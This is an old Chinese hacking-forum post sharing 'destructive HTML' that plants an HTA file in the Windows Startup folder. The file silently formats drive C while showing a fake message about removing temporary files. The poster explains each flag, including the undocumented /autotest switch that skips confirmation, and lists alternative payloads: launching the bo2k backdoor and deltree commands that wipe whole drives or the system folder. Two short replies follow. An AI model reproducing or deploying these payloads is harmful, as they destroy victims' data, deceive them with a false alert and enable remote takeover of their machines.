首页
社区
课程
招聘
[旧帖] [分享]网页攻击 0.00雪花
发表于: 2010-7-27 16:57 1432

[旧帖] [分享]网页攻击 0.00雪花

2010-7-27 16:57
1432
这段是具有破坏性的HTML

Hacking Your Computer .

scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();

(懂HTML的人应该就看得出来其中精随)

现在我大概来解释其中几个项目所写的意思

scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"

这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为 hack.hta

wsh.Run('start.exe /m format c:/q /autotest /u');

通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。

它是一个微软没有公开的功能,键入後format的动作便会被强制执行。

这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。

最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小化的状态。

执行其他攻击指令的方法∶

只要修改“start.exe /m format c:/q /autotest /u”这一项便形。

start.exe /m format c:/q /autotest /u

其中的“c:”可以换做其他的硬碟。

(path)\bo2k.exe

执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。

start.exe /m deltree /y a:\*.* c:\*.* d:\*.*

杀掉对方硬碟底下所有的档案。

start.exe /m deltree /y c:\windows\system\*.*

杀掉对方c:\windows\system\目录底下的所有档案。

[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 73
活跃值: (16)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
楼主懂的东西真多,看了之后感觉很惭愧啊,因为还是看不懂,学习喽。。。。。。
2010-7-27 16:59
0
雪    币: 38
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
我也是刚刚学的
2010-7-27 17:09
0
游客
登录 | 注册 方可回帖
返回
//